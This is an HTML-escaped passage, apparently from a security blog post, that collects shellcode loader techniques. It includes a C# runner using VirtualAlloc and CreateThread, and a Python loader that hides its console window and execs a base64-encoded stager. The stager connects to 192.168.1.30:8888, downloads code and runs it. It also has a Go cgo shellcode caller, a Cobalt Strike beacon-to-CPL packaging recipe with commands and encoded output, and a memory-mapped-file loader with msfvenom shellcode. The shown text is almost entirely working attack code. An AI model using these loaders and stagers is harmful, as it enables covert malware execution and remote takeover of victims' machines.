            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// prepare data&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;// execute native code&lt;/span&gt;
            &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;funcAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pinfo&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;threadId&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="m"&gt;0xFFFFFFFF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="m"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;VirtualAlloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flAllocationType&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;flProtect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;VirtualFree&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;lpAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwFreeType&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetModuleHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;moduleName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetProcAddress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hModule&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;procName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;LoadLibrary&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;lpFileName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Python Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;

&lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;GetConsoleWindow&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ShowWindow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;UTF-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)}[&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;version_info&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]](&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Go with Inline C:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"C"&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"unsafe"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"&lt;/span&gt;
    &lt;span class="o"&gt;...&lt;/span&gt; &lt;span class="c"&gt;// Additional shellcode bytes omitted&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"&lt;/span&gt;
    &lt;span class="c"&gt;// at your call site, you can send the shellcode directly to the C&lt;/span&gt;
    &lt;span class="c"&gt;// function by converting it to a pointer of the correct type.&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;char&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;unsafe&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])))&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Resource Loading: CPLResourceRunner
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'\n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate shellcode using Cobalt Strike:&lt;br&gt;
Attacks -&amp;gt; Packages -&amp;gt; Windows Executable (s) -&amp;gt; Output =&amp;gt; RAW (x86)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;py &lt;span class="nt"&gt;-2&lt;/span&gt; ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt

0x4d,0x5a,0x41,0x52,0x55,0x48,0x89,0xe5,0x48,0x81,0xec,0x20,0x00,0x00,0x00,0x48,0x8d,0x1d,0xea,0xff,0xff,0xff,0x48,0x89,0xdf,0x48,0x81,0xc3,0x7c,0x79,0x01,0x00,0xff,0xd3,0x41,0xb8,0xf0,0xb5,0xa2,0x56,0x68,0x04,0x00,0x00,0x00,0x5a,0x48,0x89,0xf9,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0xc9,0xdb,0x6e,0xe9,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0xeb,0x54,0xd2,0xba,0x15,0xba,0x00,0xba,0x13

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt

H4sIAPGjM14AA/ONcgwK9eh86tH4RoGBgcGjV/bV////PTrvezQerqlkZPh/2XHHh62LwjJYgLJR
Hp0//19ggIEfQMwnv4uPYQvnWcUdjD5nFUMyMosVCory04sScxWSE/Py8ksUklIVikrzFDLzFFz8
&lt;span class="nv"&gt;gxVy81NS9Xi5VKBGnLyd97J3F8MuGH4dcmmXKJAWBgD9vO6hmAAAAA&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;

Compile to x86 and copy CPLResourceRunner.dll to RunMe.cpl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  PowerShell Loading (MMFml):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;mmfExeTwo&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO.MemoryMappedFiles&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

   &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
   &lt;span class="p"&gt;{&lt;/span&gt;

       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;delegate&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

       &lt;span class="c1"&gt;// To handle the location by applying the appropriate type&lt;/span&gt;
       &lt;span class="c1"&gt;// We had to create a delegate to handle the the pointer to the location where we shim in the shellcode&lt;/span&gt;
       &lt;span class="c1"&gt;// into the Memory Mapped File.  This allows the location of the opp code to be referenced later for execution&lt;/span&gt;
       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;unsafe&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="c1"&gt;// 64bit shell code.  Tested on a win10 system.  Injects "cmd -k calc"&lt;/span&gt;
           &lt;span class="c1"&gt;// was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"&lt;/span&gt;
           &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;
               &lt;span class="p"&gt;{&lt;/span&gt;
                   &lt;span class="m"&gt;0xfc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x60&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span 